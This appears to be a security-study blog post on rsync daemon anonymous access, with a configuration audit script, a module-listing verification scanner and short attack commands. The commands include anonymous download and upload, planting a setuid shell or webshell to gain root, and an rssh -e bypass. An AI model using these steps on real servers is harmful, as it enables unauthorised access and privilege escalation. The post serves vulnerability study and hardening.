Foreword
Two days ago I summarised the common vulnerabilities found on the intranets of Internet and IT companies, and decided to study the ones I have not yet learned, one by one. Today is the first. The aim is to finish within this year. Why is it so difficult? Because I am usually busy with work and do not necessarily have time to study every week. Common web vulnerabilities and weak-password vulnerabilities are not included in this study.
Introduction to Rsync
What is Rsync
Rsync (remote synchronize) is a remote data synchronization tool that can quickly synchronize files between multiple hosts over a LAN or WAN. When run as a daemon it listens on TCP port 873 and exports directories as named "modules", which is the mode that the rest of this post is concerned with.
What is Rsync's anonymous access
Anonymous access is very simple: no user name is required, and none of the usual authentication material (passwords, public and private keys, biometrics, and so on) is needed. In short, the service can be used directly, without any access control. For rsync this means a daemon module exported without `auth users`, so anyone who can reach port 873 can list and read it, and can also write to it if the module sets `read only = no`.
General hazards
Download: #rsync -avz a.b.c.d::path/file path/filename
Upload: #rsync -avz path/filename a.b.c.d::path/file
Privilege escalation
#chmod a+s shell
#rsync -avz shell a.b.c.d::path/file
*Check that the shell's permissions are unchanged after transfer; running it escalates to root. Uploading a webshell can also be attempted.*
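Every hazard listed above comes from a module whose rsyncd.conf lacks `auth users` (anonymous read) and, for the upload and privilege-escalation cases, also sets `read only = no`. The following audit script is an added example, not code from the original post: it parses an rsyncd.conf, applies rsync's documented defaults (`read only = yes`, `use chroot = yes`, `uid = nobody`) and flags modules that are anonymous, writable, unrestricted by `hosts allow`, or served as root. The embedded `SAMPLE_CONF` is constructed for illustration; its `[backup]` module shows the weak setting and `[www]` the corrected one. Pass a real file path as the first argument to audit that instead.

```python
"""Audit an rsyncd.conf for modules exposed to anonymous access.

Added example, not code from the original post.  The sample configuration
below is constructed for illustration.
"""
import re
import sys

# Values rsync uses when a module does not set the parameter (rsyncd.conf(5)).
DEFAULTS = {"read only": "yes", "list": "yes", "use chroot": "yes", "uid": "nobody"}
TRUE_WORDS = {"yes", "true", "1"}


def _norm(key):
    """rsync matches parameter names case-insensitively; normalise spacing too."""
    return " ".join(key.lower().split())


def parse_rsyncd_conf(text):
    """Parse rsyncd.conf text into (global_params, {module_name: params}).

    Handles '#'/';' comment lines, '[module]' headers and 'key = value' lines;
    backslash line continuation is not supported by this small parser.
    """
    global_params, modules, current = {}, {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        header = re.match(r"^\[(.+)\]$", line)
        if header:
            current = header.group(1).strip()
            modules[current] = {}
            continue
        if "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        target = global_params if current is None else modules[current]
        target[_norm(key)] = value
    return global_params, modules


def effective(params, global_params, key):
    """Module value, else the global value, else rsync's built-in default."""
    return params.get(key, global_params.get(key, DEFAULTS.get(key, "")))


def is_true(value):
    return value.strip().lower() in TRUE_WORDS


def audit(text):
    """Return (module, severity, finding) tuples; an empty list means nothing flagged."""
    global_params, modules = parse_rsyncd_conf(text)
    findings = []
    for name, params in modules.items():
        anonymous = not effective(params, global_params, "auth users").strip()
        writable = not is_true(effective(params, global_params, "read only"))
        open_to_all = not effective(params, global_params, "hosts allow").strip()
        runs_as_root = effective(params, global_params, "uid").strip().lower() in {"root", "0"}
        if anonymous and writable:
            findings.append((name, "HIGH",
                             "anonymous write: no 'auth users' and 'read only = no', so anyone can upload"))
        elif anonymous:
            findings.append((name, "MEDIUM",
                             "anonymous read: no 'auth users', so anyone can download the module"))
        if anonymous and open_to_all:
            findings.append((name, "MEDIUM", "no 'hosts allow': module is reachable from any source address"))
        if writable and runs_as_root:
            findings.append((name, "HIGH", "writable module served as root: uploads are written with root privileges"))
        if not is_true(effective(params, global_params, "use chroot")):
            findings.append((name, "LOW", "'use chroot = no': the module is served without chroot containment"))
    return findings


# Constructed sample: [backup] is the weak setting, [www] the corrected one.
SAMPLE_CONF = """\
uid = nobody
gid = nobody
use chroot = yes

[backup]
    path = /srv/backup
    comment = nightly backups
    read only = no

[www]
    path = /var/www
    read only = yes
    auth users = deploy
    secrets file = /etc/rsyncd.secrets
    hosts allow = 10.0.0.0/24
"""

if __name__ == "__main__":
    conf = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_CONF
    for module, severity, finding in audit(conf):
        print(f"[{severity}] [{module}] {finding}")
```

The `[www]` module is the shape of the fix: `auth users` plus a `secrets file` for authentication, `read only = yes` unless writes are genuinely needed, and `hosts allow` to restrict which addresses may talk to the daemon at all. The audit is intentionally conservative and only reads the configuration; it does not connect to any host.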
rssh
Separately, rssh 2.3.3-3 does not properly filter rsync's -e option, which can cause problems.
#rsync -e ./script.sh a.b.c.d::/tmp --server ./
Vulnerability verification
- Metasploit's auxiliary/scanner/rsync/modules_list
- Python script
```python
# -*- coding:utf-8 -*-
"""
Rsync anonymous access (unauthorised access) vulnerability verification tool
"""
# Import the required packages and libraries
import sys
import socket
import logging

# Global configuration
logging.basicConfig(level=logging.INFO, format="%(message)s")
socket.setdefaulttimeout(3)

# Global variables
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)


# Global functions:
def str2Binary(content):
    """Convert a hex text string into a byte string"""
    return bytes.fromhex(content.replace(' ', '').replace('\n', ''))


def rsyncCheck(ip, port):
    """Run the port pre-check: greet the daemon and ask it to list its modules"""
    global client
    try:
        client.connect((ip, port))
    except Exception as reason:
        logging.error("[-] Connection failed: %s" % reason)
        return False
    # Hex for "@RSYNCD: 31.0\n", the client's protocol greeting
    helloString = "405253594e43443a2033312e300a"
    try:
        client.send(str2Binary(helloString))
        hellodata = client.recv(1024)
    except Exception as reason:
        logging.error("[-] Communication failed: %s" % reason)
        return False
    if hellodata.find(b"@RSYNCD") >= 0:
        try:
            # A bare newline ("0a") asks the daemon for its module list
            client.send(str2Binary("0a"))
        except Exception as reason:
            logging.error("[-] Connection failed: %s" % reason)
            return False
        while True:
            try:
                data = client.recv(1024)
            except Exception as reason:
                # Stop here: continuing would reuse an undefined or stale `data`
                logging.error("[-] Communication failed: %s" % reason)
                break
            if data == b"":
                break
            # The daemon terminates the module list with "@RSYNCD: EXIT"
            if data.find(b"@RSYNCD: EXIT") >= 0:
                logging.info("[*] Vulnerability found!")
                return True
    return False


if __name__ == "__main__":
    if len(sys.argv) < 2:
        logging.error("Usage: %s <ip> [port]" % sys.argv[0])
        sys.exit(1)
    ip = sys.argv[1]
    try:
        port = sys.argv[2]
    except Exception as reason:
        port = 873
        logging.error("[-] No port given, using the default port 873")
    try:
        port = int(port)
    except Exception as reason:
        logging.error("[-] Invalid port, using the default port 873")
        port = 873
    if not rsyncCheck(ip, port):
        logging.info("[+] Test passed: secure!")
```